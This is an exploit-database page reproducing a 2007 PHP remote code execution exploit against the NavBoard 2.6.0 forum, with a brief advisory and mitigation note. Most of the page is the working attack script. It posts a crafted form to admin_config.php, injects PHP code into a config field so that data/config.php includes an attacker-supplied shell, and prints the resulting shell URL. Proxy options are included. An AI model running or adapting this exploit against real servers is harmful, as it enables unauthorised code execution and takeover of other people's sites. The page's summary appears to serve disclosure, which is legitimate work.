header-logo
Suggest Exploit
vendor:
NavBoard
by:
Y! Underground Group (Dj7xpl)
7.5
CVSS
HIGH
Remote Code Execution
Not mentioned
CWE
Product Name: NavBoard
Affected Version From: NavBoard 2.6.0
Affected Version To: NavBoard 2.6.0
Patch Exists: NO
Related CWE: Not mentioned
CPE: Not mentioned
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Not mentioned

Remote Code Execution Exploit in NavBoard 2.6.0

The NavBoard 2.6.0 portal is vulnerable to remote code execution. The vulnerability exists due to improper input validation in the 'admin_config.php' file. An attacker can exploit this vulnerability by sending a specially crafted request to the target system, which allows them to execute arbitrary code on the target system. This can lead to unauthorized access, data theft, and further compromise of the system.

Mitigation:

Update to a patched version of NavBoard or apply the vendor-supplied patch. Additionally, it is recommended to follow secure coding practices and implement input validation and sanitization to prevent similar vulnerabilities.
Source

Exploit-DB raw data:

<?php

/*
        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo---------------------------------------------------

[ Y! Underground Group ]
[   Dj7xpl@yahoo.com   ]
[    Dj7xpl.2600.ir    ]

----ooooO-----Ooooo--------------------------------------------------
    (   )     (   )
     \ (       ) /
      \_)     (_/

---------------------------------------------------------------------

[!] Portal        :   NavBoard 2.6.0
[!] Download      :   http://www.sourceforge.net/projects/navboard
[!] Type          :   Remote Code Execution Exploit

---------------------------------------------------------------------
*/

/*
Vuln Code :

[Code]

if(!$editconfig){

 tableheader1();
 print "<form action=\"admin_config.php\" method=post>";
 print "<input type=hidden name=\"editconfig\" value=\"1\" size=40>"; 
 print "<tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Main forum settings</b>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Board Title";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"boardtitle\" value=\"$configarray[0]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Admin email address (blank will not display)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"adminemail\" value=\"$configarray[35]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Main website address (NOT forum address, blank will display forum address)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"mainwebsite\" value=\"$configarray[36]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Display text title instead of graphic logo for faster loading<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[34]=="on")
 {print "<input type=checkbox name=\"textlogo\" class=\"forminput\" checked>";}
 else{print "<input type=checkbox name=\"textlogo\" class=\"forminput\">";}
 print "</span></td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 
 print "<b>Forums</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max levels of subforums to display on one page (less will make for faster loading)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxsubforumdisplay\" value=\"$configarray[27]\" size=2 class=\"forminput\">";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Don't find forum reply count on the fly, recount during posting<br>(faster forum page, may slow posting slightly)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[42]=="on"){
 print "<input type=checkbox name=\"dontscanreplycount\" class=\"forminput\" checked>";
 }else{print "<input type=checkbox name=\"dontscanreplycount\" class=\"forminput\">";}
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Forum/Thread indenting amount<br>Percentage of title cell used for indent spaing";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"indentspacing\" value=\"$configarray[44]\" size=2 class=\"forminput\">%";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 
 print "<b>Posts</b><br>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Seconds before user may add another post (flood control)";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"postfloodcontrolsec\" value=\"$configarray[37]\" size=2 class=\"forminput\">";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Amount of nested bbcodes allowed<br>(how many times a bbcode tag can be put over itself) 3 is default";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"nestedbbcodes\" value=\"$configarray[43]\" size=2 class=\"forminput\">";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Show names for user levels instead of imageicons:<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[45]=="on"){
 print "<input type=checkbox name=\"userlevelnames\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"userlevelnames\" class=\"forminput\">";
 }
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Show all edits instead of only last edit on posts<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[46]=="on"){
 print "<input type=checkbox name=\"showalledits\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"showalledits\" class=\"forminput\">";
 }
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 
 print "<b>Registration</b><br>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Seconds before another account can be registered (flood control)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"regfloodcontrolsec\" value=\"$configarray[38]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Method of registration<br>";
 print "NOTE: Mailing in php must be setup correctly on your server to work with email confirmation";
 print "</span></td><td class=\"tablecell2\" width=\"50%\"><span class=\"textlarge\">";
 if($configarray[39]=="on"||$configarray[39]==""){
 print "<input type=radio name=\"registration\" value=\"on\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"registration\" value=\"on\" class=\"forminput\"> ";
 }
 print "Allowed<br>";
 if($configarray[39]=="confirm"){
 print "<input type=radio name=\"registration\" value=\"confirm\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"registration\" value=\"confirm\" class=\"forminput\"> ";
 }
 print "Email confirmed<br>";
 if($configarray[39]=="approve"){
 print "<input type=radio name=\"registration\" value=\"approve\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"registration\" value=\"approve\" class=\"forminput\"> ";
 }
 print "Admin approved";
 print "</span></td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Profiles</b>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Allow duplicate display names<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[32]=="on"){
 print "<input type=checkbox name=\"allowdupdisplay\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"allowdupdisplay\" class=\"forminput\">";
 }
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Display name changing<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\"><span class=\"textlarge\">";
 if($configarray[41]=="off"){
 print "<input type=radio name=\"displaychange\" value=\"off\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"displaychange\" value=\"off\" class=\"forminput\"> ";
 }
 print "Not allowed<br>";
 if($configarray[41]=="on"||$configarray[41]==""){
 print "<input type=radio name=\"displaychange\" value=\"on\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"displaychange\" value=\"on\" class=\"forminput\"> ";
 }
 print "Allowed<br>";
 if($configarray[41]=="approve"){
 print "<input type=radio name=\"displaychange\" value=\"approve\" class=\"forminput\" checked> ";
 }else{
 print "<input type=radio name=\"displaychange\" value=\"approve\" class=\"forminput\"> ";
 }
 print "Admin approved";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Default time format (php <a href=\"http://www.php.net/manual/en/function.date.php\" target=\"_new\">date</a> format) ";
 print "Recommended: n-j-Y h:iA <br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"defaulttime\" value=\"$configarray[33]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max people on individual users buddy lists";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"buddylistmax\" value=\"$configarray[28]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Avatars</b><br>";
 print "</span></td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Avatar file size limit (bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"avatarfilesize\" value=\"$configarray[9]\" size=20 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Avatar dimensions limit (height)x(width)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"avatardimension\" value=\"$configarray[10]\" size=20 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Attachments</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Allowed attachment extensions (separated by commas) (blank would allow no attachments)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"allowedattachext\" value=\"$configarray[22]\" size=40 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max size of attachments (in bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxattachsize\" value=\"$configarray[23]\" size=20 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total size of all attachments (in bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxtotalattachsize\" value=\"$configarray[31]\" size=20 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Polls</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max poll options<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxpolloptions\" value=\"$configarray[24]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Theme</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Default theme<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 $themesarray=listdirs("themes");
 print "<select size=1 name=\"defaulttheme\" size=40 class=\"forminput\">\n";
 for($n=0;$n<count($themesarray);$n++){

  if($themesarray[$n]==$configarray[12]){
  print "<option value=\"$themesarray[$n]\" selected>$themesarray[$n]</option>";
  }else{
  print "<option value=\"$themesarray[$n]\">$themesarray[$n]</option>";
  }

 }
 print "</select>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Online users</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Seconds of inactivity before user is removed from online list (300seconds=5minutes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"inactivityseconds\" value=\"$configarray[13]\" size=2 class=\"forminput\">";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Page settings</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Threads to show per page in forum<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"threadperpage\" value=\"$configarray[7]\" size=2 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Posts to show per page in thread<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"postperpage\" value=\"$configarray[8]\" size=2 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Max character settings</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total characters in body of posts<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxcharsbody\" value=\"$configarray[18]\" size=5 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total characters in subject of posts<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxcharssubject\" value=\"$configarray[25]\" size=5 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total characters in signatures<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxcharssigs\" value=\"$configarray[19]\" size=5 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Enabling/Disabling</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Allow HTML in posts:<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[14]=="allowhtml"){
 print "<input type=checkbox name=\"html\" class=\"forminput\" checked>";
 }else{
 print "<input type=checkbox name=\"html\" class=\"forminput\">";
 }
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Enable GZ Compression:<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 if($configarray[21]=="disablegz"){
 print "<input type=checkbox name=\"gzcompress\" class=\"forminput\">";
 }else{
 print "<input type=checkbox name=\"gzcompress\" class=\"forminput\" checked>";
 } 
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Private Messaging</b><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total size of pms per user (bytes)<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxpmsize\" value=\"$configarray[29]\" size=10 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Max total number of pms per user<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"maxpmnumber\" value=\"$configarray[30]\" size=10 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tableheadercell\" colspan=\"2\"><span class=\"textlarge\">";
 print "<b>Board Closing</b>";
 print "</td></tr><tr><td class=\"tablecell1\" width=\"50%\"><span class=\"textlarge\">";
 print "Entering info here will cause the entire bulletin board to be closed<br>";
 print "This is the message that shows up when the board is closed<br>";
 print "</span></td><td class=\"tablecell2\" width=\"50%\">";
 print "<input type=text name=\"boardclosing\" value=\"$configarray[40]\" size=60 class=\"forminput\"><br>";
 print "</td></tr><tr><td class=\"tablecell2\" colspan=\"2\"><span class=\"textlarge\">";
 print "<input type=submit name=\"submit\" value=\"Update\" class=\"formbutton\">";
 print "</span>";
 print "</td>";
 print "</form>";
 print "</tr>";
 print "</table>";
 }

 if($editconfig){

 $boardtitle=stripslashes($boardtitle);
 $boardtitle=htmlentities($boardtitle);
 writedata("$maindatadir/config.php",$boardtitle,0);
 writedata("$maindatadir/config.php",$threadperpage,7);
 writedata("$maindatadir/config.php",$postperpage,8);
 writedata("$maindatadir/config.php",$avatarfilesize,9);
 writedata("$maindatadir/config.php",$avatardimension,10);
 writedata("$maindatadir/config.php",$defaulttheme,12);
 writedata("$maindatadir/config.php",$inactivityseconds,13);
 if($html=="on"){
 writedata("$maindatadir/config.php","allowhtml",14);
 }else{
 writedata("$maindatadir/config.php","denyhtml",14);
 }
 writedata("$maindatadir/config.php",$maxcharsbody,18);
 writedata("$maindatadir/config.php",$maxcharssigs,19);
 if($gzcompress=="on"){
 writedata("$maindatadir/config.php","enablegz",21);
 }else{
 writedata("$maindatadir/config.php","disablegz",21);
 }
 writedata("$maindatadir/config.php",$allowedattachext,22);
 writedata("$maindatadir/config.php",$maxattachsize,23);
 writedata("$maindatadir/config.php",$maxpolloptions,24);
 writedata("$maindatadir/config.php",$maxcharssubject,25);
 writedata("$maindatadir/config.php",$maxsubforumdisplay,27);
 writedata("$maindatadir/config.php",$buddylistmax,28);
 writedata("$maindatadir/config.php",$maxpmsize,29);
 writedata("$maindatadir/config.php",$maxpmnumber,30);
 writedata("$maindatadir/config.php",$maxtotalattachsize,31);
 writedata("$maindatadir/config.php",$allowdupdisplay,32);
 writedata("$maindatadir/config.php",$defaulttime,33);
 writedata("$maindatadir/config.php",$textlogo,34);
 writedata("$maindatadir/config.php",$adminemail,35);
 writedata("$maindatadir/config.php",$mainwebsite,36);
 writedata("$maindatadir/config.php",$postfloodcontrolsec,37);
 writedata("$maindatadir/config.php",$regfloodcontrolsec,38);
 writedata("$maindatadir/config.php",$registration,39);
 writedata("$maindatadir/config.php",$boardclosing,40);
 writedata("$maindatadir/config.php",$displaychange,41);
 
 if($configarray[42]!=="on"&&$dontscanreplycount=="on"){//if turning on for first time, make a recount
  for($n=0;$n<count($forumarray);$n++){
  $topicarray=listdirs("$configarray[2]/$forumarray[$n]");
  $replies=0;
   for($m=0;$m<count($topicarray);$m++){
    $postarray2=listfiles("$configarray[2]/$forumarray[$n]/$topicarray[$m]");
    $replies+=count($postarray2)-1;
   }
  writedata("$configarray[2]/$forumarray[$n].php",$replies,11);
  }
 writedata("$maindatadir/config.php",$dontscanreplycount,42);
 }else{
 writedata("$maindatadir/config.php",$dontscanreplycount,42);
 }
 
 writedata("$maindatadir/config.php",$nestedbbcodes,43);
 writedata("$maindatadir/config.php",$indentspacing,44);
 writedata("$maindatadir/config.php",$userlevelnames,45);
 writedata("$maindatadir/config.php",$showalledits,46);


[/Code]
*/

if ($argc<2) {
print_r('
-----------------------------------------------------------------------------

Usage: php '.$argv[0].' Host Path Options
host:       Target server (ip/hostname)
path:       Path To Folder

Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy

Example:
php '.$argv[0].' 127.0.0.1 /Forum/ -P1.1.1.1:80

-----------------------------------------------------------------------------
');

die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacket($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=7; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

/*Data*/

$data.='-----------------------------7d6224c08dc
Content-Disposition: form-data; name="editconfig"


-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardtitle"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="threadperpage"

www\";include \"\$shell\";\/\/
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postperpage"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatarfilesize"

11
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="avatardimension"

123
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttheme"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="inactivityseconds"

#CCFF00
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="html"

on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharsbody"

111
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssigs"

11122
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="gzcompress"

on
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowedattachext"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxattachsize"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpolloptions"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxcharssubject"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxsubforumdisplay"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="buddylistmax"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmsize"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxpmnumber"

Dj7xpl
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="maxtotalattachsize"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="allowdupdisplay"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="defaulttime"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="textlogo"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="adminemail"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="mainwebsite"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="postfloodcontrolsec"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="regfloodcontrolsec"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="registration"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="boardclosing"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="displaychange"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="replies"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="dontscanreplycount"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="nestedbbcodes"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="indentspacing"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="userlevelnames"

red
-----------------------------7d6224c08dc
Content-Disposition: form-data; name="showalledits"

red
-----------------------------7d6224c08dc
';


/*Echo Header*/
echo "[!] NavBoard 2.6.0\r\n";
echo "[!] Powered By Y! Underground Group\r\n";
echo "[!] Vuln And Coded By Dj7xpl\r\n";

/*Sending Data*/
$packet ="POST ".$path."admin_config.php HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6224c08dc\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacket($packet);
sleep(2);
Echo "[!] Shell : http://".$host.$path."data/config.php?shell=Evil Text\r\n";

?>

# milw0rm.com [2007-05-23]

Navigation

Suggest Exploit

Services By CQR